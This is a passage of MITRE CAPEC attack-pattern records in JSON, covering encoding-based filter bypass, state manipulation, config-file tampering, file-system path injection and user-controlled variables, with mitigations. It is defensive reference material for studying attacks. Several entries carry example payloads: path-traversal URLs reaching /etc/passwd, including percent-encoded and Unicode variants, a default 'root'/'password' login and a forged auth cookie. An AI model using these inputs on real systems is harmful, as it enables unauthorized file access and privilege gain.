need to be recycled to prevent aging, that is every once in a while a new password must be chosen."]},"Example_Instances":{"Example":["A user sets their password to \\"123\\" or intentionally leaves their password blank. If the system does not have password strength enforcement against a sound password policy, this password may be admitted. Passwords like these two examples are two simple and common passwords that are easily able to be guessed by the adversary.","Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username \\"root\\" with a password \\"password\\". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288","In April 2019, adversaries attacked several popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. An investigation conducted by the Microsoft Security Resposne Center (MSRC) discovered that these devices were used to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer\u2019s passwords and in the third instance the latest security update had not been applied to the device. [REF-572]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"798"},{"CWE_ID":"654"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1078.001","Entry_Name":"Valid Accounts:Default Accounts"}},"References":{"Reference":[{"External_Reference_ID":"REF-572"},{"External_Reference_ID":"REF-574"},{"External_Reference_ID":"REF-596","Section":"Testing for Account Enumeration and Guessable User Account"},{"External_Reference_ID":"REF-597","Section":"Testing for Default Credentials"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Try Common(default) Usernames and Passwords",{"Date":"2017-08-04"}]}},"71":{"ID":"71","Name":"Using Unicode Encoding to Bypass Validation Logic","Abstraction":"Detailed","Status":"Draft","Description":"An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe entry points to locate vulnerabilities] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various Unicode encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.","Technique":["Try to use Unicode encoding of content in Scripts in order to bypass validation routines.","Try to use Unicode encoding of content in HTML in order to bypass validation routines.","Try to use Unicode encoding of content in CSS in order to bypass validation routines."]}]},"Prerequisites":{"Prerequisite":"Filtering is performed on data that has not be properly canonicalized."},"Skills_Required":{"Skill":["An attacker needs to understand Unicode encodings and have an idea (or be able to find out) what system components may not be Unicode aware.",{"Level":"Medium"}]},"Indicators":{"Indicator":"Unicode encoded data is passed to APIs where it is not expected"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII.","Ensure that filtering or input validation is applied to canonical data.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system."]},"Example_Instances":{"Example":{"div":["Attack Example: Unicode Encodings in the IIS Server",{"style":"color:#32498D; font-weight:bold;"},"http://target.server/some_directory/../../../winnt",{"style":"margin-left:10px;","class":"informative"},". yields C0 AE",{"style":"margin-left:10px;","class":"informative"},"http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winnt",{"style":"margin-left:10px;","class":"informative"}],"p":["A very common technique for a Unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is","In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters.","In October 2000, an adversary publicly revealed that Microsoft\'s IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The Unicode translations are","Using this conversion, the previously displayed URL can be encoded as"]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"176"},{"CWE_ID":"179"},{"CWE_ID":"180"},{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"184"},{"CWE_ID":"183"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"692"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Unicode Encoding"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"72":{"ID":"72","Name":"URL Encoding","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the encoding of the URL. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The attacker could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an attacker may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker accesses the server using a specific URL."},{"Step":"2","Phase":"Experiment","Description":"The attacker tries to encode some special characters in the URL. The attacker finds out that some characters are not filtered properly."},{"Step":"3","Phase":"Exploit","Description":"The attacker crafts a malicious URL string request and sends it to the server."},{"Step":"4","Phase":"Exploit","Description":"The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters may have harmful consequences."}]},"Prerequisites":{"Prerequisite":["The application should accepts and decodes URL input.","The application performs insufficient filtering/canonicalization on the URLs."]},"Skills_Required":{"Skill":["An attacker can try special characters in the URL and bypass the URL validation.",{"Level":"Low"},"The attacker may write a script to defeat the input filtering mechanism.",{"Level":"Medium"}]},"Indicators":{"Indicator":["If the first decoding process has left some invalid or denylisted characters, that may be a sign that the request is malicious.","Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks."]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Refer to the RFCs to safely decode URL.","Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.","There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).","Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.","Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)","When client input is required from web-based forms, avoid using the \\"GET\\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \\"POST method whenever possible."]},"Example_Instances":{"Example":[{"p":["Attack Example: URL Encodings in IceCast MP3 Server.","The following type of encoded string has been known traverse directories against the IceCast MP3 server9:","or using","The control character \\"..\\" can be used by an attacker to escape the document root."],"div":["http://[targethost]:8000/somefile/%2E%2E/target.mp3",{"style":"margin-left:10px;","class":"informative"},"\\"/%25%25/\\" instead of \\"/../\\".",{"style":"margin-left:10px;","class":"informative"}]},{"p":["Cross-Site Scripting","[REF-495]"],"div":[{"style":"margin-left:10px;","class":"attack","div":["URL-Encoded attack:",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"result","div":["HTML execution:",{"style":"color:#32498D; font-weight:bold;"}]}]},{"p":["SQL Injection","From \\"URL encoded attacks\\", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html"],"div":[{"style":"margin-left:10px;","class":"informative","div":["Original database query in the example file - \\"login.asp\\":",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"attack","div":["URL-encoded attack:",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"result","div":["Executed database query:",{"style":"color:#32498D; font-weight:bold;"}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"177"},{"CWE_ID":"172"},{"CWE_ID":"73"},{"CWE_ID":"74"},{"CWE_ID":"20"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-495"},{"External_Reference_ID":"REF-496"},{"External_Reference_ID":"REF-497"},{"External_Reference_ID":"REF-498"},{"External_Reference_ID":"REF-499"},{"External_Reference_ID":"REF-500","Section":"5.11.4. Validating Hypertext Links (URIs/URLs)"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Indicators, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"73":{"ID":"73","Name":"User-Controlled Filename","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"165"},{"Nature":"CanPrecede","CAPEC_ID":"592"}]},"Prerequisites":{"Prerequisite":"The victim must trust the name and locale of user controlled filenames."},"Skills_Required":{"Skill":["To achieve a redirection and use of less trusted source, an attacker can simply edit data that the host uses to build the filename",{"Level":"Low"},"Deploying a malicious \\"look-a-like\\" site (such as a site masquerading as a bank or online auction site) that the user enters their authentication data into.",{"Level":"Medium"},"Exploiting a client side vulnerability to inject malicious scripts into the browser\'s executable process.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Availability","Impact":"Alter Execution Logic"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Perform input validation for all remote content.","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Scan dynamically generated content against validation specification"]},"Example_Instances":{"Example":"Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user\'s email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim\'s host system and network environment."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"20"},{"CWE_ID":"184"},{"CWE_ID":"96"},{"CWE_ID":"348"},{"CWE_ID":"116"},{"CWE_ID":"350"},{"CWE_ID":"86"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"}}},"74":{"ID":"74","Name":"Manipulating State","Abstraction":"Meta","Status":"Stable","Description":{"p":["The adversary modifies state information maintained by the target software or causes a state transition in hardware. If successful, the target will use this tainted state and execute in an unintended manner.","State management is an important function within a software application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.","If there is a hardware logic error in a finite state machine, the adversary can use this to put the system in an undefined state which could cause a denial of service or exposure of secure data."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Adversary determines the nature of state management employed by the target. This includes determining the location (client-side, server-side or both applications) and possibly the items stored as part of user state."},{"Step":"2","Phase":"Experiment","Description":"The adversary now tries to modify the user state contents (possibly indiscriminately if the contents are encrypted or otherwise obfuscated) or cause a state transition and observe the effects of this change on the target."},{"Step":"3","Phase":"Exploit","Description":"Having determined how to manipulate the state, the adversary can perform illegitimate actions."}]},"Prerequisites":{"Prerequisite":["User state is maintained at least in some way in user-controllable locations, such as cookies or URL parameters.","There is a faulty finite state machine in the hardware logic that can be exploited."]},"Skills_Required":{"Skill":["The adversary needs to have knowledge of state management as employed by the target application, and also the ability to manipulate the state in a meaningful way.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary needs a data tampering tool capable of generating and creating custom inputs to aid in the attack, like Fiddler, Wireshark, or a similar in-browser plugin (e.g., Tamper Data for Firefox)."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state.","Avoid sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.","Sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request.","All possible states must be handled by hardware finite state machines."]},"Example_Instances":{"Example":{"p":["During the authentication process, an application stores the authentication decision (auth=0/1) in unencrypted cookies. At every request, this cookie is checked to permit or deny a request.","An adversary can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"372"},{"CWE_ID":"315"},{"CWE_ID":"353"},{"CWE_ID":"693"},{"CWE_ID":"1245"},{"CWE_ID":"1253"},{"CWE_ID":"1265"},{"CWE_ID":"1271"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Probing_Techniques, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Consequences, Description, Execution_Flow, Mitigations, Prerequisites, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses"}],"Previous_Entry_Name":["Manipulating User State",{"Date":"2020-07-30"}]}},"75":{"ID":"75","Name":"Manipulating Writeable Configuration Files","Abstraction":"Standard","Status":"Draft","Description":"Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers\' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"Configuration files must be modifiable by the attacker"},"Skills_Required":{"Skill":["To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Backup copies of all configuration files","Implementation: Integrity monitoring for configuration files","Implementation: Enforce audit logging on code and configuration promotion procedures.","Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD"]},"Example_Instances":{"Example":{"p":["The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml","The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect."],"div":["< CustomRealm",{"style":"margin-left:10px;","class":"informative","div":["ConfigurationData=\\"java.util.Properties\\"",{"style":"margin-left:10px;"}]}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"349"},{"CWE_ID":"99"},{"CWE_ID":"77"},{"CWE_ID":"346"},{"CWE_ID":"353"},{"CWE_ID":"354"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"76":{"ID":"76","Name":"Manipulating Web Input to File System Calls","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"126"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Fingerprinting of the operating system] In order to create a valid file injection, the attacker needs to know what the underlying OS is so that the proper file seperator is used.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey the Application to Identify User-controllable Inputs] The attacker surveys the target application to identify all user-controllable inputs, possibly as a valid and authenticated user","Technique":["Spider web sites for all available links, entry points to the web site.","Manually explore application and inventory all application inputs"]},{"Step":"3","Phase":"Experiment","Description":"[Vary inputs, looking for malicious results] Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application","Technique":["Inject context-appropriate malicious file path using network packet injection tools (netcat, nemesis, etc.)","Inject context-appropriate malicious file path using web test frameworks (proxies, TamperData, custom programs, etc.) or simple HTTP requests","Inject context-appropriate malicious file system control syntax"]},{"Step":"4","Phase":"Exploit","Description":"[Manipulate files accessible by the application] The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)","Technique":["The attacker injects context-appropriate malicious file path to access the content of the targeted file.","The attacker injects context-appropriate malicious file system control syntax to access the content of the targeted file.","The attacker injects context-appropriate malicious file path to cause the application to create, delete a targeted file.","The attacker injects context-appropriate malicious file system control syntax to cause the application to create, delete a targeted file.","The attacker injects context-appropriate malicious file path in order to manipulate the meta-data of the targeted file.","The attacker injects context-appropriate malicious file system control syntax in order to manipulate the meta-data of the targeted file."]}]},"Prerequisites":{"Prerequisite":"Program must allow for user controlled variables to be applied directly to the filesystem"},"Skills_Required":{"Skill":["To identify file system entry point and execute against an over-privileged system interface",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege.","Design: Ensure all input is validated, and does not contain file system commands","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables."]},"Example_Instances":{"Example":{"p":["The attacker uses relative path traversal to access files in the application. This is an example of accessing user\'s password file.","However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.","Then an attacker creates special payloads to bypass this filter:","When the application gets this input string, it will be the desired vector by the attacker."],"div":["http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd",{"style":"margin-left:10px;","class":"attack"},"http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"23"},{"CWE_ID":"22"},{"CWE_ID":"73"},{"CWE_ID":"77"},{"CWE_ID":"346"},{"CWE_ID":"348"},{"CWE_ID":"285"},{"CWE_ID":"272"},{"CWE_ID":"59"},{"CWE_ID":"74"},{"CWE_ID":"15"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Examples-Instances, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Manipulating Input to File System Calls",{"Date":"2017-01-09"}]}},"77":{"ID":"77","Name":"Manipulating User-Controlled Variables","Abstraction":"Standard","Status":"Draft","Description":"This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"22","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker communicates with the application server using a thin client (browser) or thick client."},{"Step":"2","Phase":"Experiment","Description":"While communicating with the server, the attacker finds that they can control and override a variable consumed by the application server."},{"Step":"3","Phase":"Exploit","Description":"The attacker overrides the variable and influences the normal behavior of the application server."}]},"Prerequisites":{"Prerequisite":["A variable consumed by the application server is exposed to the client.","A variable consumed by the application server can be overwritten by the user.","The application server trusts user supplied data to compute business logic.","The application server does not perform proper input validation."]},"Skills_Required":{"Skill":["The malicious user can easily try some well-known global variables and find one which matches.",{"Level":"Low"},"The attacker can use automated tools to probe for variables that they can control.",{"Level":"Medium"}]},"Indicators":{"Indicator":"A web penetration tool probing a web server may generate abnormal activities recorded on log files. Abnormal traffic such as a high number of request coming from the same client may also rise the warnings from a monitoring system or an intrusion detection tool."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":[{"p":["Do not allow override of global variables and do Not Trust Global Variables.","If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables."]},"A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary.","Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.","Use encapsulation when declaring your variables. This is to lower the exposure of your variables.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should be rejected by the program."]},"Example_Instances":{"Example":{"div":["Attack Example: PHP Global Variables",{"style":"color:#32498D; font-weight:bold;"},"while($count < 10){",{"style":"margin-left:10px;","class":"informative"},"GET /login.php?count=9",{"style":"margin-left:10px;","class":"informative"}],"p":["PHP is a study in bad security. The main idea pervading PHP is \\"ease of use,\\" and the mantra \\"don\'t make the developer go to any extra work to get stuff done\\" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.","One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.","Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:","Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem 